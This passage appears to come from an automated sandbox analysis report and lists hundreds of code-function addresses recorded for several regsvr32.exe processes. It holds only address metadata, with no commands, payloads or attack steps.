                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800232203_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020A343_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076343_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022E383_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E6383_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800102503_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A643_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800042643_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800136743_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F6783_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E2783_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005E7C3_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025E883_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002868C3_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014E983_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014AA43_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126A83_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800036A83_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A6BC3_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CABC3_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EAC03_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B6D43_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F2DC3_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800202E03_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800226E03_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019AF03_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BEF03_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012EF83_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800297103_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800177103_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C7403_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020F443_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023B483_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800237483_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217543_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800223583_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029F5C3_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B3683_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001BF703_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800253743_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007F743_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180021F7C3_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800197883_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001B8C3_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283943_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013B943_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001479C3_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E7A03_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800087A43_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017BA83_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EBAC3_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3B83_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012BB83_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800257C03_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008BC03_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800117C43_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800227E03_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003B00004_2_003B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083F84_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800264104_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000680F4_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025C304_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800136744_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C4_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A48C4_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011CCC4_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF04_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800297104_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026F144_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800237484_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001D584_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B3684_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800013784_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800105904_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800091A84_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800165E44_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018FE84_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ABE84_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029DF04_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243F44_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015DF44_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800011F44_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800247FC4_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DBFC4_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FE084_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001100C4_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027E144_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B6184_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800232204_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027C284_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020A344_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076344_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022E384_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E6384_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002143C4_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001303C4_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A8404_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800038404_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B4444_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F0484_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AC4C4_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800100504_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800102504_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800030504_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011E5C4_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000445C4_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C85C4_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800034604_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A644_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800042644_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029C6C4_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001586C4_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000406C4_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E06C4_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC704_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F6784_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E2784_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001447C4_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005E7C4_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026C804_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180010C844_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025E884_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160884_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800028884_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002868C4_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FC8C4_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002D0984_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014E984_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014AA44_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126A84_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800036A84_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154B84_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A6BC4_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CABC4_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EAC04_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C6C84_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C2C84_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064D04_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B6D44_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800180D44_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800054D84_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F2DC4_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800202E04_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002CCE04_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800226E04_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800254E44_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800184E84_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800010E84_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019AF04_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E8F04_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A0F84_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012EF84_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800199004_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800119044_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F9084_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002490C4_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001890C4_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D5104_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800177104_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003D184_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002191C4_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800163204_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D1284_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D12C4_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800149304_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085344_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C7404_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020F444_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CD444_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023B484_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B9484_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217544_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800223584_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029F5C4_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000796C4_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001BF704_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800253744_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007F744_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021F7C4_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800197884_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001B8C4_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D944_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283944_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013B944_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001479C4_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E7A04_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800087A44_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017BA84_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EBAC4_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012BB84_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3B84_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800171B84_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018DBC4_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800257C04_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008BC04_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800117C44_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800141C84_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B1D44_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023DDC4_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800227E04_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F12B05_2_000007FEF74F12B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F443C5_2_000007FEF74F443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F53FB5_2_000007FEF74F53FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F4A705_2_000007FEF74F4A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5E015_2_000007FEF74F5E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5CAD5_2_000007FEF74F5CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F68505_2_000007FEF74F6850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_002B00005_2_002B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264105_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025C305_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D585_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011E5C5_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C6C85_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C2C85_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026F145_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800163205_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800013785_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018FE85_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ABE85_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243F45_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083F85_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800247FC5_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBFC5_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001100C5_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027C285_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002143C5_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001303C5_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A8405_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800038405_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B4445_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F0485_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AC4C5_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800100505_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800030505_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000445C5_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C85C5_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800034605_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029C6C5_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001586C5_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000406C5_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E06C5_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC705_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001447C5_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026C805_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010C845_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160885_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800028885_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017C8C5_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC8C5_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D0985_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154B85_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011CCC5_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064D05_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800180D45_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800054D85_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CCE05_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800254E45_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800184E85_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800010E85_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E8F05_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A0F85_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199005_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119045_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9085_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002490C5_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001890C5_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D5105_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180003D185_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002191C5_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D1285_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D12C5_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800149305_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085345_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD445_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B9485_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000796C5_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800105905_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D945_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091A85_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800171B85_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DBC5_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C85_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B1D45_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023DDC5_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800165E45_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029DF05_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015DF45_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800011F45_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FE085_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027E145_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B6185_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800232205_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020A345_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076345_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180022E385_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E6385_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800102505_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026A645_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800042645_2_0000000180004264
